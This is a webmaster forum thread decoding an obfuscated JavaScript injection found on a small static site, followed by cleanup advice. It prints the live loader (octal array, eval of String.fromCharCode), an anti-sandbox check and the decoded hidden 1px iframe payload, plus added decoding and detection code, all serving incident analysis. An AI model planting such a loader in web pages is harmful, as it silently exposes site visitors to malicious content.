Probable injection - can anyone translate

     

topr8

8:16 am on May 13, 2013 (gmt 0)

a friend of mine seems to have had some kind of javascript injection into their site ... i've cleaned it all up for them, i suspect the host is to blame as they don't have a database or run any scripts except for a mailer (which is supplied by the host) ... maybe the ftp was hacked but i doubt it.

anyway, any idea what this means, this was the first bit, i assume they translate to characters in some way...

a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,
16,44,172,145,166,44,171,171,172,44,101,44,150,163,147,171,161,151,162,170,62,147,
166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,
53,55,77,21,16,21,16,44,171,171,172,62,167,166,147,44,101,44,53,154,170,170,164,
76,63,63,152,145,160,160,163,171,170,67,62,145,147,147,155,62,147,176,63,153,
114,165,133,106,170,166,174,62,164,154,164,53,77,21,16,44,171,171,172,62,167,
170,175,160,151,62,164,163,167,155,170,155,163,162,44,101,44,53,145,146,167,
163,160,171,170,151,53,77,21,16,44,171,171,172,62,167,170,175,160,151,62,146,
163,166,150,151,166,44,101,44,53,64,53,77,21,16,44,171,171,172,62,167,170,175,
160,151,62,154,151,155,153,154,170,44,101,44,53,65,164,174,53,77,21,16,44,171,
171,172,62,167,170,175,160,151,62,173,155,150,170,154,44,101,44,53,65,164,174,
53,77,21,16,44,171,171,172,62,167,170,175,160,151,62,160,151,152,170,44,101,44,
53,65,164,174,53,77,21,16,44,171,171,172,62,167,170,175,160,151,62,170,163,164,
44,101,44,53,65,164,174,53,77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,
161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,
53,171,171,172,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62,173,
166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,171,171,172,140,53,
102,100,63,150,155,172,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,
153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,171,171,172,53,
55,62,145,164,164,151,162,150,107,154,155,160,150,54,171,171,172,55,77,21,16,44,
201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,
157,155,151,54,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,
151,132,145,160,171,151,60,162,110,145,175,167,60,164,145,170,154,55,44,177,
21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,
170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,
162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,
175,167,101,101,162,171,160,160,44,200,200,44,162,110,145,175,167,101,101,
64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,164,155,166,151,62,
167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,
161,151,54,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,
55,77,21,16,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,44,
101,44,147,163,163,157,155,151,122,145,161,151,57,46,101,46,57,151,167,147,
145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,
44,46,77,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,
151,62,170,163,113,121,130,127,170,166,155,162,153,54,55,44,57,44,54,54,
164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,44,57,44,164,
145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,
163,162,44,113,151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,
44,177,21,16,44,172,145,166,44,167,170,145,166,170,44,101,44,150,163,147,
171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,
152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,
44,160,151,162,44,101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,
160,151,162,153,170,154,44,57,44,65,77,21,16,44,155,152,44,54,44,54,44,45,
167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45,
101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,
171,146,167,170,166,155,162,153,54,44,64,60,44,162,145,161,151,62,160,
151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16,44,166,151,
170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,
44,54,44,167,170,145,166,170,44,101,101,44,61,65,44,55,44,166,151,
170,171,166,162,44,162,171,160,160,77,21,16,44,172,145,166,44,151,
162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,
157,155,151,62,155,162,150,151,174,123,152,54,44,46,77,46,60,44,
160,151,162,44,55,77,21,16,44,155,152,44,54,44,151,162,150,44,101,
101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,
151,162,170,62,147,163,163,157,155,151,62,160,151,162,153,170,
154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,
145,164,151,54,44,150,163,147,171,161,151,162,170,62,147,163,163,
157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,160,151,
162,60,44,151,162,150,44,55,44,55,77,21,16,201,21,16,155,152,44,54,
162,145,172,155,153,145,170,163,166,62,147,163,163,157,155,151,111,
162,145,146,160,151,150,55,21,16,177,21,16,155,152,54,113,151,170,
107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,
165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,
107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,
165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,
21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"["split"](","))

bhonda

8:54 am on May 13, 2013 (gmt 0)

Was there any code to use it? I've just searched for a subset of this code and noticed some have this before it -

ss=eval("Str"+"ing");d=document;a=("44,152...

topr8

9:24 am on May 13, 2013 (gmt 0)

yes, i found a few sites had it when i did a search...

the full code was:
as pasted above followed by...

ss=eval("Str"+"ing");d=document;for(i=0;i<a.length;i+=1){a[i]=parseInt(a[i],8)-(7-3);}try{d.body++}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss["fromCharCode"].apply(ss,a));




so the a= was at the beginning in this case.

bhonda

11:17 am on May 13, 2013 (gmt 0)

So, the first few numbers in the array would be -

32
102
117
110

Are they HTML codes?

32 = [space]
102 = f
117 = u
110 = n
99 = c
116 = t
105 = i
111 = o
110 = n

Hmm...looks so. Anyone fancy writing a little convertor for this?

astupidname

11:44 am on May 13, 2013 (gmt 0)

That string you posted (definition of the 'a' variable) has illegal new lines in it (broken string) so after replacing new lines, remove the other bits of code which appear after the definition of the 'a' variable and replace with the following:
d=document;
for(i=0;i<a.length;i+=1){
a[i]=parseInt(a[i],8)-(7-3);
}
try{d.body++}catch(q){zz=0;}
try{zz&=2}catch(q){zz=1;}
if(!zz)if(window["document"])a = String.fromCharCode.apply(String, a);
alert(a);


The non-evaluated code as a string is then presented to you as:

 function zzzfff() {
var uuv = document.createElement('iframe');

uuv.src = 'http://example.com';
uuv.style.position = 'absolute';
uuv.style.border = '0';
uuv.style.height = '1px';
uuv.style.width = '1px';
uuv.style.left = '1px';
uuv.style.top = '1px';

if (!document.getElementById('uuv')) {
document.write('<div id=\'uuv\'></div>');
document.getElementById('uuv').appendChild(uuv);
}
}
function SetCookie(cookieName,cookieValue,nDays,path) {
var today = new Date();
var expire = new Date();
if (nDays==null || nDays==0) nDays=1;
expire.setTime(today.getTime() + 3600000*24*nDays);
document.cookie = cookieName+"="+escape(cookieValue)
+ ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');

zzzfff();
}
}

[edited by: whoisgregg at 2:05 pm (utc) on May 16, 2013]
[edit reason] sanitized url [/edit]
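An added example, not code from any of the posts above: it does the same conversion as the loader topr8 pasted (parseInt(a[i],8)-(7-3), then String.fromCharCode) and as astupidname's decoder, but never eval()s the result, tolerates the line breaks that broke the pasted string, and rejects tokens that are not octal. It also re-implements the loader's try{d.body++}catch... gate with the undeclared zz made explicit, so you can see why it runs in a browser (the document.body setter only accepts a body or frameset element and throws on NaN) but silently skips itself in a naive sandbox whose "document" is a plain object. The two document mocks, the indicator names and the cut-down sample payload are constructed for this example; the nine-token prefix and the loader line are the ones quoted in the thread, and the patterns in INDICATORS are only the ones visible in this thread's loader and decoded payload.

```javascript
// Added example for this thread (not code from the original posts): decode
// the loader's octal array without eval, model its try/catch gate, and
// triage page text for the loader's tell-tale patterns. All sample inputs
// below are constructed or copied from the tokens quoted in the thread.

// The loader does parseInt(a[i],8)-(7-3) then String.fromCharCode, then eval.
// This does the same conversion but only returns the decoded text.
// Whitespace (the line breaks that broke the pasted string) is ignored.
function decodeOctalArray(commaString) {
  const tokens = commaString.replace(/\s+/g, '').split(',').filter(Boolean);
  const codes = tokens.map((tok) => {
    if (!/^[0-7]+$/.test(tok)) throw new Error(`not an octal token: ${tok}`);
    return parseInt(tok, 8) - 4;
  });
  if (codes.some((c) => c < 0 || c > 0xffff)) throw new Error('code out of range');
  return String.fromCharCode(...codes);
}

// Forward transform, used only to build round-trip test input here.
function encodeOctalArray(text) {
  return Array.from(text, (ch) => (ch.charCodeAt(0) + 4).toString(8)).join(',');
}

// First nine tokens of the array quoted in the thread; they decode to " function".
const THREAD_PREFIX = '44,152,171,162,147,170,155,163,162';

// The loader's gate, re-implemented with the undeclared `zz` made explicit:
//   try{d.body++}catch(q){zz=0;} try{zz&=2}catch(q){zz=1;} if(!zz) eval(...)
// document.body++ assigns NaN to document.body. A browser's body setter only
// accepts a <body>/<frameset> element and throws, so zz becomes 0 and the
// payload runs. In a bare-object "document" the assignment succeeds, zz is
// still undeclared, `zz&=2` throws a ReferenceError, zz becomes 1, and the
// payload is silently skipped: a cheap anti-sandbox check.
function gateWouldRunPayload(doc) {
  let zz;
  let zzDeclared = false;
  try { doc.body++; } catch (e) { zz = 0; zzDeclared = true; }
  try {
    if (!zzDeclared) throw new ReferenceError('zz is not defined');
    zz &= 2;
  } catch (e) { zz = 1; }
  return !zz;
}

// Constructed stand-ins for the two environments (hypothetical mocks).
function browserLikeDocument() {
  let body = { nodeName: 'BODY' };
  return {
    get body() { return body; },
    set body(v) {
      if (v === null || typeof v !== 'object') throw new TypeError('HierarchyRequestError');
      body = v;
    },
  };
}
function naiveSandboxDocument() { return { body: {} }; }

// Patterns taken from the loader and decoded payload shown in the thread.
const INDICATORS = [
  { name: 'string-constructor-via-eval', re: /eval\(\s*["']Str["']\s*\+\s*["']ing["']\s*\)/ },
  { name: 'octal-array-decode', re: /parseInt\([^)]*,\s*8\s*\)/ },
  { name: 'fromCharCode-apply', re: /fromCharCode["'\]]*\s*\.apply\s*\(/ },
  { name: 'hidden-1px-iframe', re: /createElement\(\s*['"]iframe['"]\s*\)[\s\S]{0,400}?(height|width)\s*=\s*['"]1px['"]/ },
  { name: 'visited-cookie-gate', re: /GetCookie\(\s*['"]visited_/ },
];
function findIndicators(text) {
  return INDICATORS.filter((i) => i.re.test(text)).map((i) => i.name);
}

// Constructed samples: the loader line from the thread, and a cut-down
// version of the decoded payload.
const SAMPLE_LOADER = 'ss=eval("Str"+"ing");d=document;for(i=0;i<a.length;i+=1){a[i]=parseInt(a[i],8)-(7-3);}'
  + 'if(!zz)if(window["document"])eval(ss["fromCharCode"].apply(ss,a));';
const SAMPLE_DECODED = `function zzzfff() {
var uuv = document.createElement('iframe');
uuv.src = 'http://example.com';
uuv.style.height = '1px';
uuv.style.width = '1px';
}
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq','55','1','/'); zzzfff();}`;

// Stand-alone run
console.log(decodeOctalArray(THREAD_PREFIX));
console.log(gateWouldRunPayload(browserLikeDocument()), gateWouldRunPayload(naiveSandboxDocument()));
console.log(findIndicators(SAMPLE_LOADER), findIndicators(SAMPLE_DECODED));
```

To decode the real thing, paste the full comma list (line breaks and all) into decodeOctalArray; the result is the same text astupidname posted, but nothing in it ever executes. findIndicators is meant for grepping the other 50-odd HTML files for the loader, which is more reliable than eyeballing them, since the array itself changes from site to site while the loader line and the 1px iframe do not.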

bhonda

11:46 am on May 13, 2013 (gmt 0)

Man, you got there just before I did!

Might be worth removing the URL.

topr8

5:25 am on May 18, 2013 (gmt 0)

thanks for the replies - i thought the thread had been deleted!

lucy24

7:09 am on May 18, 2013 (gmt 0)

>>as pasted above followed by...

Aha, the missing link. If you take the original numbers at face value it's garbage:
,˜«ą“Ș›Łą,°°°˜˜˜
et cetera. (The number that turns into 32, i.e. space, starts out as 44 which happens to be a comma.)

>>illegal new lines

I think they were inserted by a moderator because the original post would otherwise have circled the earth :)

jimbeetle

10:17 pm on May 18, 2013 (gmt 0)

>>i suspect the host is to blame as they don't have a database or run any scripts except for a mailer (which is supplied by the host) ... maybe the ftp was hacked but i doubt it

The host doesn't have to be the one to blame, and the site doesn't have to run a database or any scripts. And *don't* doubt that the ftp was hacked.

Have your friend scrub the local machine just in case a keylogger was downloaded. This is a *very* common technique for the bad guys to capture passwords. I was hit a few years ago.

>>i've cleaned it all up for them

Are you sure? Did you just clean the files or did you find the file the bad guys might have left behind?

topr8

2:37 pm on May 19, 2013 (gmt 0)

>>I think they were inserted by a moderator because the original post would otherwise have circled the earth

actually yes, i make the line breaks before posting, as i realised it would have stretched on forever!

>>Are you sure?

well i did my best ... deleted all the files on the server from their filespace.
then manually checked every file (there were not that many, only around 50 and they were only plain html) i removed all the 'injected' lines of code.
i also suggested that they reinstall windows on their local machine, which they said they did, they live in a different town to me, i wasn't going to drive over and do it for them!

but i appreciate your point jim, this is not my area of expertise and it is entirely possible that i may have missed something. so far though the injection hasn't recurred.

thanks for everyone's input, much appreciated.

so i can see the code set a presumably malicious iframe, which would have tried to run some kind of script on the site visitors machines.... i guess this is the common purpose of these type of injection attacks.

jimbeetle

3:31 pm on May 21, 2013 (gmt 0)

It's not my area of expertise at all, either, just that one very painful experience.

I'm assuming it's shared hosting so it might be best to contact the host so it can clean any spurious files off the server as from what I shakily understand there can be cross-domain contamination.

topr8

5:22 pm on May 21, 2013 (gmt 0)

i figured it was probably an infection at the host level, but the host was adamant it wasn't them - no knowing if that is true or not though.

i advised them to move hosts anyway just in case, seemed the obvious thing to do.

it made me glad of my own set up! dedicated server, and a hardware firewall which only allows ftp, ssh and any admin page access from my own ip address.